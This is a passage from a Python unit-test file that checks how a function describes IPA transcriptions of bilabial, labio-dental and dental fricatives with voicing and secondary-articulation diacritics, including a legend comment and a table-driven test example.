def test_βʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("βʰˤ")
self.assertEqual(actual, expected)
def test_β̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("β̬ʰˤ")
self.assertEqual(actual, expected)
def test_ɸ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial fricative pulmonic egressive consonant"
actual = describe_transcription("ɸ̬ʰˤ")
self.assertEqual(actual, expected)
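# Legend for the diacritics and superscripts exercised throughout these
# fricative tests (standard IPA usage; stated here for readability, not
# asserted by the suite itself):
#   U+030A ring above / U+0325 ring below  -> voiceless
#   U+032C caron below                     -> voiced
#   ʰ (U+02B0) -> aspirated      ʷ (U+02B7) -> labialized
#   ʲ (U+02B2) -> palatalized    ˠ (U+02E0) -> velarized
#   ˤ (U+02E4) -> pharyngealized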
# voiceless labio-dental fricative pulmonic egressive consonant
def test_f_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f")
self.assertEqual(actual, expected)
def test_f̊_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊")
self.assertEqual(actual, expected)
def test_f̥_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥")
self.assertEqual(actual, expected)
def test_v̊_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊")
self.assertEqual(actual, expected)
def test_v̥_is_the_representation_of_the_voiceless_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥")
self.assertEqual(actual, expected)
# voiceless labialized labio-dental fricative pulmonic egressive consonant
def test_fʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʷ")
self.assertEqual(actual, expected)
def test_f̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ʷ")
self.assertEqual(actual, expected)
def test_f̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ʷ")
self.assertEqual(actual, expected)
def test_v̊ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʷ")
self.assertEqual(actual, expected)
def test_v̥ʷ_is_the_representation_of_the_voiceless_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labio-dental fricative pulmonic egressive consonant
def test_fʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʲ")
self.assertEqual(actual, expected)
def test_f̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ʲ")
self.assertEqual(actual, expected)
def test_f̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ʲ")
self.assertEqual(actual, expected)
def test_v̊ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʲ")
self.assertEqual(actual, expected)
def test_v̥ʲ_is_the_representation_of_the_voiceless_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labio-dental fricative pulmonic egressive consonant
def test_fˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fˠ")
self.assertEqual(actual, expected)
def test_f̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ˠ")
self.assertEqual(actual, expected)
def test_f̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ˠ")
self.assertEqual(actual, expected)
def test_v̊ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ˠ")
self.assertEqual(actual, expected)
def test_v̥ˠ_is_the_representation_of_the_voiceless_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labio-dental fricative pulmonic egressive consonant
def test_fˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fˤ")
self.assertEqual(actual, expected)
def test_f̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̊ˤ")
self.assertEqual(actual, expected)
def test_f̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̥ˤ")
self.assertEqual(actual, expected)
def test_v̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ˤ")
self.assertEqual(actual, expected)
def test_v̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labio-dental fricative pulmonic egressive consonant
def test_fʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰ")
self.assertEqual(actual, expected)
def test_v̥ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰ")
self.assertEqual(actual, expected)
def test_v̊ʰ_is_the_representation_of_the_voiceless_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant
def test_fʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰʷ")
self.assertEqual(actual, expected)
def test_v̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰʷ")
self.assertEqual(actual, expected)
def test_v̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant
def test_fʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰʲ")
self.assertEqual(actual, expected)
def test_v̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰʲ")
self.assertEqual(actual, expected)
def test_v̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant
def test_fʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰˠ")
self.assertEqual(actual, expected)
def test_v̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰˠ")
self.assertEqual(actual, expected)
def test_v̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant
def test_fʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("fʰˤ")
self.assertEqual(actual, expected)
def test_v̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̥ʰˤ")
self.assertEqual(actual, expected)
def test_v̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̊ʰˤ")
self.assertEqual(actual, expected)
# voiced labio-dental fricative pulmonic egressive consonant
def test_v_is_the_representation_of_the_voiced_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v")
self.assertEqual(actual, expected)
def test_f̬_is_the_representation_of_the_voiced_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬")
self.assertEqual(actual, expected)
# voiced labialized labio-dental fricative pulmonic egressive consonant
def test_vʷ_is_the_representation_of_the_voiced_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʷ")
self.assertEqual(actual, expected)
def test_f̬ʷ_is_the_representation_of_the_voiced_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized labio-dental fricative pulmonic egressive consonant
def test_vʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʲ")
self.assertEqual(actual, expected)
def test_f̬ʲ_is_the_representation_of_the_voiced_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized labio-dental fricative pulmonic egressive consonant
def test_vˠ_is_the_representation_of_the_voiced_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vˠ")
self.assertEqual(actual, expected)
def test_f̬ˠ_is_the_representation_of_the_voiced_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labio-dental fricative pulmonic egressive consonant
def test_vˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vˤ")
self.assertEqual(actual, expected)
def test_f̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated labio-dental fricative pulmonic egressive consonant
def test_vʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰ")
self.assertEqual(actual, expected)
def test_v̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰ")
self.assertEqual(actual, expected)
def test_f̬ʰ_is_the_representation_of_the_voiced_aspirated_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labio-dental fricative pulmonic egressive consonant
def test_vʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰʷ")
self.assertEqual(actual, expected)
def test_v̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰʷ")
self.assertEqual(actual, expected)
def test_f̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant
def test_vʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰʲ")
self.assertEqual(actual, expected)
def test_v̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰʲ")
self.assertEqual(actual, expected)
def test_f̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labio-dental fricative pulmonic egressive consonant
def test_vʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰˠ")
self.assertEqual(actual, expected)
def test_v̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰˠ")
self.assertEqual(actual, expected)
def test_f̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant
def test_vʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("vʰˤ")
self.assertEqual(actual, expected)
def test_v̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("v̬ʰˤ")
self.assertEqual(actual, expected)
def test_f̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labio_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labio-dental fricative pulmonic egressive consonant"
actual = describe_transcription("f̬ʰˤ")
self.assertEqual(actual, expected)
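# The cases above are exhaustive but highly repetitive. A minimal sketch of
# how one family could be table-driven with unittest's subTest (assuming
# describe_transcription is in scope, as in the rest of this file); every
# expectation below restates a case already asserted individually above.
def test_labio_dental_fricative_examples_table_driven(self):
    cases = {
        "f": "voiceless labio-dental fricative pulmonic egressive consonant",
        "v": "voiced labio-dental fricative pulmonic egressive consonant",
        "fʷ": "voiceless labialized labio-dental fricative pulmonic egressive consonant",
        "vʲ": "voiced palatalized labio-dental fricative pulmonic egressive consonant",
    }
    for transcription, description in cases.items():
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), description)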
# voiceless dental fricative pulmonic egressive consonant
def test_θ_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ")
self.assertEqual(actual, expected)
def test_θ̊_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊")
self.assertEqual(actual, expected)
def test_θ̥_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥")
self.assertEqual(actual, expected)
def test_ð̊_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊")
self.assertEqual(actual, expected)
def test_ð̥_is_the_representation_of_the_voiceless_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥")
self.assertEqual(actual, expected)
# voiceless labialized dental fricative pulmonic egressive consonant
def test_θʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʷ")
self.assertEqual(actual, expected)
def test_θ̊ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ʷ")
self.assertEqual(actual, expected)
def test_θ̥ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ʷ")
self.assertEqual(actual, expected)
def test_ð̊ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʷ")
self.assertEqual(actual, expected)
def test_ð̥ʷ_is_the_representation_of_the_voiceless_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized dental fricative pulmonic egressive consonant
def test_θʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʲ")
self.assertEqual(actual, expected)
def test_θ̊ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ʲ")
self.assertEqual(actual, expected)
def test_θ̥ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ʲ")
self.assertEqual(actual, expected)
def test_ð̊ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʲ")
self.assertEqual(actual, expected)
def test_ð̥ʲ_is_the_representation_of_the_voiceless_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized dental fricative pulmonic egressive consonant
def test_θˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θˠ")
self.assertEqual(actual, expected)
def test_θ̊ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ˠ")
self.assertEqual(actual, expected)
def test_θ̥ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ˠ")
self.assertEqual(actual, expected)
def test_ð̊ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ˠ")
self.assertEqual(actual, expected)
def test_ð̥ˠ_is_the_representation_of_the_voiceless_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized dental fricative pulmonic egressive consonant
def test_θˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θˤ")
self.assertEqual(actual, expected)
def test_θ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̊ˤ")
self.assertEqual(actual, expected)
def test_θ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θ̥ˤ")
self.assertEqual(actual, expected)
def test_ð̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ˤ")
self.assertEqual(actual, expected)
def test_ð̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated dental fricative pulmonic egressive consonant
def test_θʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰ")
self.assertEqual(actual, expected)
def test_ð̥ʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰ")
self.assertEqual(actual, expected)
def test_ð̊ʰ_is_the_representation_of_the_voiceless_aspirated_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized dental fricative pulmonic egressive consonant
def test_θʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰʷ")
self.assertEqual(actual, expected)
def test_ð̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰʷ")
self.assertEqual(actual, expected)
def test_ð̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized dental fricative pulmonic egressive consonant
def test_θʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰʲ")
self.assertEqual(actual, expected)
def test_ð̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰʲ")
self.assertEqual(actual, expected)
def test_ð̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized dental fricative pulmonic egressive consonant
def test_θʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰˠ")
self.assertEqual(actual, expected)
def test_ð̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰˠ")
self.assertEqual(actual, expected)
def test_ð̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant
def test_θʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("θʰˤ")
self.assertEqual(actual, expected)
def test_ð̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̥ʰˤ")
self.assertEqual(actual, expected)
def test_ð̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð̊ʰˤ")
self.assertEqual(actual, expected)
# voiced dental fricative pulmonic egressive consonant
def test_ð_is_the_representation_of_the_voiced_dental_fricative_pulmonic_egressive_consonant(self):
expected = "voiced dental fricative pulmonic egressive consonant"
actual = describe_transcription("ð")
